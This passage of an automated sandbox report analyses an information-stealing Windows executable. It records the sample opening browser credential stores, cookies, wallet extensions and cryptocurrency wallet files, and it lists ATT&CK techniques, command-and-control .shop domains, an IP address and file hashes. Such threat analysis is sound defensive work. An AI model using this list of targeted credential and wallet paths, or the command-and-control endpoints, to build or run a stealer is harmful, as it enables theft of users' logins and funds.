        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        311
        Process Injection
        11
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        311
        Process Injection
        11
        Input Capture
        141
        Security Software Discovery
        Remote Desktop Protocol11
        Input Capture
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares1
        Archive Collected Data
        113
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model31
        Data from Local System
        Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets11
        File and Directory Discovery
        SSH2
        Clipboard Data
        Fallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials33
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe46%VirustotalBrowse
        SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe100%AviraHEUR/AGEN.1314931
        SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        pearcyworkeronej.shop1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        zippyfinickysofwps.shop0%Avira URL Cloudsafe
        acceptabledcooeprs.shop0%Avira URL Cloudsafe
        plaintediousidowsko.shop0%Avira URL Cloudsafe
        pearcyworkeronej.shop0%Avira URL Cloudsafe
        https://pearcyworkeronej.shop/apibu40%Avira URL Cloudsafe
        boredimperissvieos.shop0%Avira URL Cloudsafe
        obsceneclassyjuwks.shop0%Avira URL Cloudsafe
        plaintediousidowsko.shop1%VirustotalBrowse
        zippyfinickysofwps.shop1%VirustotalBrowse
        https://pearcyworkeronej.shop/0%Avira URL Cloudsafe
        https://pearcyworkeronej.shop:443/api0%Avira URL Cloudsafe
        sweetsquarediaslw.shop0%Avira URL Cloudsafe
        https://pearcyworkeronej.shop:443/api2%VirustotalBrowse
        holicisticscrarws.shop0%Avira URL Cloudsafe
        https://pearcyworkeronej.shop/s0%Avira URL Cloudsafe
        obsceneclassyjuwks.shop1%VirustotalBrowse
        miniaturefinerninewjs.shop0%Avira URL Cloudsafe
        https://pearcyworkeronej.shop/1%VirustotalBrowse
        holicisticscrarws.shop1%VirustotalBrowse
        https://pearcyworkeronej.shop/api0%Avira URL Cloudsafe
        pearcyworkeronej.shop1%VirustotalBrowse
        miniaturefinerninewjs.shop1%VirustotalBrowse
        https://pearcyworkeronej.shop/api2%VirustotalBrowse
        acceptabledcooeprs.shop1%VirustotalBrowse
        sweetsquarediaslw.shop11%VirustotalBrowse
        boredimperissvieos.shop1%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        pearcyworkeronej.shop
        172.67.131.204
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        plaintediousidowsko.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        acceptabledcooeprs.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        zippyfinickysofwps.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        pearcyworkeronej.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        boredimperissvieos.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        obsceneclassyjuwks.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        sweetsquarediaslw.shoptrue
        • 11%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        holicisticscrarws.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        miniaturefinerninewjs.shoptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://pearcyworkeronej.shop/apitrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://pearcyworkeronej.shop/apibu4RegAsm.exe, 00000001.00000002.1734058125.0000000000EED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://pearcyworkeronej.shop/RegAsm.exe, 00000001.00000002.1733951463.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://pearcyworkeronej.shop:443/apiRegAsm.exe, 00000001.00000002.1733951463.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpfalse
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://pearcyworkeronej.shop/sRegAsm.exe, 00000001.00000002.1734058125.0000000000EED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        172.67.131.204
        pearcyworkeronej.shopUnited States
        13335CLOUDFLARENETUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1436373
        Start date and time:2024-05-04 22:22:04 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 2m 36s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:3
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 85%
        • Number of executed functions: 29
        • Number of non-executed functions: 63
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): SIHClient.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        22:22:49API Interceptor7x Sleep call for process: RegAsm.exe modified
        SourceURL
        Screenshothttp://<UNKNOWNECI:015160>System.Byte[]</UNKNOWNECI>
        Screenshothttp://<UNKNOWNECI:015160>System.Byte[]</UNKNOWNECI>
        Screenshothttp://<UNKNOWNECI:015160>System.Byte[]</UNKNOWNECI>
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        172.67.131.204Ez76m3j18V.exeGet hashmaliciousLummaCBrowse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          pearcyworkeronej.shopEz76m3j18V.exeGet hashmaliciousLummaCBrowse
          • 172.67.131.204
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSSecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exeGet hashmaliciousLummaCBrowse
          • 104.21.39.216
          SecuriteInfo.com.Trojan.MulDrop9.4697.30323.11244.exeGet hashmaliciousUnknownBrowse
          • 162.159.36.2
          7Ql51TchBG.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
          • 172.67.169.18
          INVOICE KAD-0138-2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          Orden de compra 0001-00255454.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
          • 172.67.177.134
          0KRPn.vbsGet hashmaliciousAgentTeslaBrowse
          • 104.21.45.138
          Supplier Order Scan 0001293039493.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
          • 104.26.13.205
          file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          DHL_VTER000105453.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          DHL_VTER000105450.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 104.26.12.205
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exeGet hashmaliciousLummaCBrowse
          • 172.67.131.204
          Pedido-Faturado-398731.msiGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          NFs_98776.msiGet hashmaliciousVMdetectBrowse
          • 172.67.131.204
          taEPf27YpR.xllGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          taEPf27YpR.xllGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          shipping doc.exeGet hashmaliciousFormBookBrowse
          • 172.67.131.204
          citat #05022024.xla.xlsxGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          Pedido-Faturado-398731.msiGet hashmaliciousUnknownBrowse
          • 172.67.131.204
          file.exeGet hashmaliciousLummaCBrowse
          • 172.67.131.204
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.273245524862648
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe
          File size:578'048 bytes
          MD5:bab05624883fc9d5fe21f6e26c509c80
          SHA1:b9dfddb30341606e41f19b369995e1fe619214ae
          SHA256:ac9128c77beb18f3e26656a39e6df34964866ce61e8bc2424afca4c45d1aed8d
          SHA512:73a605ecd62f6c46f525dd13be73439ee9cab263786b45cf90a7146122e947d70dc228811a26fff0d8ec4ccb7999d1954993f79edf41cdfd8fa47b0fe682c1e1
          SSDEEP:12288:t/fI5jU8WtkonTgdwt8fU2A84yDfupl5zK7FHo:t3IeOfU25WnE7l
          TLSH:33C4F11174C080B2E57315320AE1DAB85E3EBD300A729A9F67881FBF5F312D2E755A57
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(tY.F'Y.F'Y.F'..E&U.F'..C&..F'..B&L.F'..B&K.F'..E&M.F'..G&\.F'Y.G'..F'..C&..F'..C&X.F'..D&X.F'RichY.F'................PE..L..
          Icon Hash:90cececece8e8eb0
          Entrypoint:0x406102
          Entrypoint Section:.text
